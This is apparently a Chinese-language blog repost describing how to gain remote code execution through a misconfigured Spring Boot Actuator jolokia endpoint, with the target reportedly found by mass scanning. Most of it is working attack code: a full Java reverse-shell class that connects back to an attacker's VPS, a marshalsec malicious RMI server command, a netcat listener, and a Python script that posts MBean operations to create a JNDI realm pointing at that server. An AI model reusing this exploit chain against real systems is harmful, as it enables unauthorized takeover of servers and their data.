當前位置:
首頁 >
前端技术
> javascript
>内容正文
javascript
Springboot之actuator配置不当漏洞RCE(jolokia)
生活随笔
收集整理的這篇文章主要介紹了
Springboot之actuator配置不当漏洞RCE(jolokia)
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
日穿掃描掃到一個spring boot actuator
可以看到有jolokia這個端點,再看下jolokia/list,存在type=MBeanFactory 關鍵字?
可以使用jolokia-realm-jndi-rce具體步驟如下
先用python3開一個web服務?
編譯java利用代碼
/*** javac -source 1.5 -target 1.5 JNDIObject.java** Build By LandGrey* */import java.io.File; import java.io.InputStream; import java.io.OutputStream; import java.net.Socket;public class JNDIObject {static {try{String ip = "your-vps-ip";String port = "443";String py_path = null;String[] cmd;if (!System.getProperty("os.name").toLowerCase().contains("windows")) {String[] py_envs = new String[]{"/bin/python", "/bin/python3", "/usr/bin/python", "/usr/bin/python3", "/usr/local/bin/python", "/usr/local/bin/python3"};for(int i = 0; i < py_envs.length; ++i) {String py = py_envs[i];if ((new File(py)).exists()) {py_path = py;break;}}if (py_path != null) {if ((new File("/bin/bash")).exists()) {cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/bash\")"};} else {cmd = new String[]{py_path, "-c", "import pty;pty.spawn(\"/bin/sh\")"};}} else {if ((new File("/bin/bash")).exists()) {cmd = new String[]{"/bin/bash"};} else {cmd = new String[]{"/bin/sh"};}}} else {cmd = new String[]{"cmd.exe"};}Process p = (new ProcessBuilder(cmd)).redirectErrorStream(true).start();Socket s = new Socket(ip, Integer.parseInt(port));InputStream pi = p.getInputStream();InputStream pe = p.getErrorStream();InputStream si = s.getInputStream();OutputStream po = p.getOutputStream();OutputStream so = s.getOutputStream();while(!s.isClosed()) {while(pi.available() > 0) {so.write(pi.read());}while(pe.available() > 0) {so.write(pe.read());}while(si.available() > 0) {po.write(si.read());}so.flush();po.flush();Thread.sleep(50L);try {p.exitValue();break;} catch (Exception e) {}}p.destroy();s.close();}catch (Throwable e){e.printStackTrace();}} } javac -source 1.5 -target 1.5 JNDIObject.java架設惡意 rmi 服務?
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://vps:8080/#JNDIObject 1389監聽端口
nc -lvp 443執行exp
#!/usr/bin/env python3 # coding: utf-8 # Referer: https://ricterz.me/posts/2019-03-06-yet-another-way-to-exploit-spring-boot-actuators-via-jolokia.txtimport requestsurl = 'http://127.0.0.1:8080/jolokia'create_realm = {"mbean": "Tomcat:type=MBeanFactory","type": "EXEC","operation": "createJNDIRealm","arguments": ["Tomcat:type=Engine"] }wirte_factory = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "contextFactory","value": "com.sun.jndi.rmi.registry.RegistryContextFactory" }write_url = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "WRITE","attribute": "connectionURL","value": "rmi://your-vps-ip:1389/JNDIObject" }stop = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "stop","arguments": [] }start = {"mbean": "Tomcat:realmPath=/realm0,type=Realm","type": "EXEC","operation": "start","arguments": [] }flow = [create_realm, wirte_factory, write_url, stop, start]for i in flow:print('%s MBean %s: %s ...' % (i['type'].title(), i['mbean'], i.get('operation', i.get('attribute'))))r = requests.post(url, json=i)r.json()print(r.status_code) python3 springboot-realm-jndi-rce.py然后等兩秒shell就回來了?
新人創作打卡挑戰賽發博客就能抽獎!定制產品紅包拿不停!總結
以上是生活随笔為你收集整理的Springboot之actuator配置不当漏洞RCE(jolokia)的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 【Linux】- 获取root权限命令
- 下一篇: 数论-扩展中国剩余定理